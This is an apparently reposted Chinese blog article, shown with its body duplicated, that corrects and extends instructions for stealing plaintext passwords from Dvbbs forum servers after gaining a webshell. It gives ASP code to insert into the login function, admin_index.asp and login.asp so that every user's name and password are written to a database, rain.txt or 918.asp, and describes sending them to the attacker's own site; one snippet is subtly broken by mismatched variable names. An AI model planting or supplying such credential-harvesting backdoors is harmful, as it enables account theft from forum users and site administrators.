关于"截取动网BBS的用户密码"一文的校正
2005-04-24 13:44
357 查看
原文说:要在它验证的前面得到它的密码,所以,我在Function Dvbbs_ChkLogin
后面加上Code:
dim dbpath,rstmp,str,rs,con
set con=server.createobject("adodb.connection")
DBPath = Server.MapPath("example.mdb")
con.Open "driver={ Microsoft Access Driver (*.mdb) };dbq=" & DBPath
set rstmp=server.createobject("adodb.recordset")
username = Request.form("username")
password = Request.form("password")
str="insert Into User (username,password) v alues('"& username &"','"& password &"')"
con.execute(str)
这句话说得不是太明白,我经过测试发现应该是在
Function Dvbbs_ChkLogin
。。。
End Function中间插入上面的代码,但是上面的代码写得不规范,调试时总是出错,最明显的“v alues”也写分开了。
我把代码调整了一下,如下:
dim dbpath,rstmp,str,rs,con
set con=server.createobject("adodb.connection")
DBPath = Server.MapPath("bbs.mdb")
con.Open "driver={Microsoft Access Driver (*.mdb)};dbq="&DBPath
set rstmp=server.createobject("adodb.recordset")
username = Request.form("username")
password = Request.form("password")
str="insert Into User (username,password) values('"&username&"','"&password&"')"
con.execute(str)
写一个关于TXT的吧!!今天在918X哪里看到 下文:
我们知道以前,获得webshell后想进入DVBBS的后台,想要管理员的密码可以这样:
老办法:
修改admin_index.asp得到明文DVBBS后台密码
在"username=trim(replace(request("username")这行后面
Dim fsoObject
Dim tsObject
Set fsoObject = Server.CreateObject("Scripting.FileSystemObject")
set tsObject = fsoObject.CreateTextFile(Server.MapPath("rain.txt"))
tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
只要管理员登陆后台,在目录下就生成了rain.txt,里面就记录了明文密码
这个办法有个缺点是需要FileSystemObject的支持,也就是需要FSO,对于没有FileSystemObject的主机就没有用了。
新办法:
方法一:login.asp中Case "chk"下:
on error resume next
dim rain
set lP=server.CreateObject("Adodb.Stream")
rain.Open
rain.Type=2
rain.CharSet="gb2312"
rain.LoadFromFile server.mapPath("918.asp")
rain.Position=lp.Size
rain.writetext now&request("username")&"text:"&request("password")&chr(10)
rain.SaveToFile server.mapPath("918.asp"),2
rain.Close
set rain=nothing
这样918.asp将获得全部登陆人的密码,时间和名字。
至于admin_index.asp你也可以加在这里只获得管理员的密码。
方法二:如果你有自己的网站:
建立目录918x,在里面建立一个空的918.asp和如下代码的rain.asp:
在login.asp那里插入一句: response.write "" --------所有登陆人都会乖乖的把名字和密码送到你的918.asp 里这下调用Adodb.Stream,几乎机子里有是有的,所以成功率要更高
后面加上Code:
dim dbpath,rstmp,str,rs,con
set con=server.createobject("adodb.connection")
DBPath = Server.MapPath("example.mdb")
con.Open "driver={ Microsoft Access Driver (*.mdb) };dbq=" & DBPath
set rstmp=server.createobject("adodb.recordset")
username = Request.form("username")
password = Request.form("password")
str="insert Into User (username,password) v alues('"& username &"','"& password &"')"
con.execute(str)
这句话说得不是太明白,我经过测试发现应该是在
Function Dvbbs_ChkLogin
。。。
End Function中间插入上面的代码,但是上面的代码写得不规范,调试时总是出错,最明显的“v alues”也写分开了。
我把代码调整了一下,如下:
dim dbpath,rstmp,str,rs,con
set con=server.createobject("adodb.connection")
DBPath = Server.MapPath("bbs.mdb")
con.Open "driver={Microsoft Access Driver (*.mdb)};dbq="&DBPath
set rstmp=server.createobject("adodb.recordset")
username = Request.form("username")
password = Request.form("password")
str="insert Into User (username,password) values('"&username&"','"&password&"')"
con.execute(str)
写一个关于TXT的吧!!今天在918X哪里看到 下文:
我们知道以前,获得webshell后想进入DVBBS的后台,想要管理员的密码可以这样:
老办法:
修改admin_index.asp得到明文DVBBS后台密码
在"username=trim(replace(request("username")这行后面
Dim fsoObject
Dim tsObject
Set fsoObject = Server.CreateObject("Scripting.FileSystemObject")
set tsObject = fsoObject.CreateTextFile(Server.MapPath("rain.txt"))
tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
只要管理员登陆后台,在目录下就生成了rain.txt,里面就记录了明文密码
这个办法有个缺点是需要FileSystemObject的支持,也就是需要FSO,对于没有FileSystemObject的主机就没有用了。
新办法:
方法一:login.asp中Case "chk"下:
on error resume next
dim rain
set lP=server.CreateObject("Adodb.Stream")
rain.Open
rain.Type=2
rain.CharSet="gb2312"
rain.LoadFromFile server.mapPath("918.asp")
rain.Position=lp.Size
rain.writetext now&request("username")&"text:"&request("password")&chr(10)
rain.SaveToFile server.mapPath("918.asp"),2
rain.Close
set rain=nothing
这样918.asp将获得全部登陆人的密码,时间和名字。
至于admin_index.asp你也可以加在这里只获得管理员的密码。
方法二:如果你有自己的网站:
建立目录918x,在里面建立一个空的918.asp和如下代码的rain.asp:
在login.asp那里插入一句: response.write "" --------所有登陆人都会乖乖的把名字和密码送到你的918.asp 里这下调用Adodb.Stream,几乎机子里有是有的,所以成功率要更高
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 截取动网BBS的用户密码
- 关于"密码最短长度为7,其中必须包含以下非字母数字字符: 1”的问题
- ECSHOP用户中心"用户信息"修改增加密码问题验证
- 如何让MAC OS X桌面程序弹出"用户登陆密码输入框"并提权至System权限
- 动网:关于部分论坛用户发帖、回帖时报错“数据中含有非法字符。您的用户名并不存在,或者您的论坛密码错误,或者您的帐号已被管理员锁定。” 及“您没有发表新主题的权限”解决方法
- 关于腾讯“窥探用户隐私”一事,请各位针对"隐私"这个关键词做些说法。
- 关于登陆时被截取用户密码的一点想法(出自新手,勿喷)
- 关于"一年成为Emacs高手(像神一样使用编辑器)"一文的答疑
- 黑马程序员之C#编程基础学习笔记:提示用户输入用户名,然后再提示输入密码,如果用户名是"admin"并且密码是“888888”,则提示正确,否则提示错误,如果用户名不是admin还提示用户用户名不存在
- 关于IE登录FTP站点,选择"保存密码"后,登录窗口不在出现的解决方法
- 关于fscanf(fd, "%*[^/n]");
- 从用户角度理解"零拷贝" (Zero Copy I: User-Mode Perspective)
- 关于在DataTable中执行DataTable.Select("条件")返回DataTable的解决方法
- 关于vs2012+caffe配置中出现的"常量中的字符太多"错误的解决办法
- 关于Qt开发MySQL程序移植后出现"Driver not loaded"的问题
- 关于JSP中单击任意标签弹出文件选择框(<input type="file"/>)的实现方法
- 关于"组"的说法
- 关于"该主机 CPU 类型不支持虚拟化性能计数器"的解决方案
- 关于代码 "object = null" 的讨论
- 关于IIS的IWAM_和IUSR_用户的密码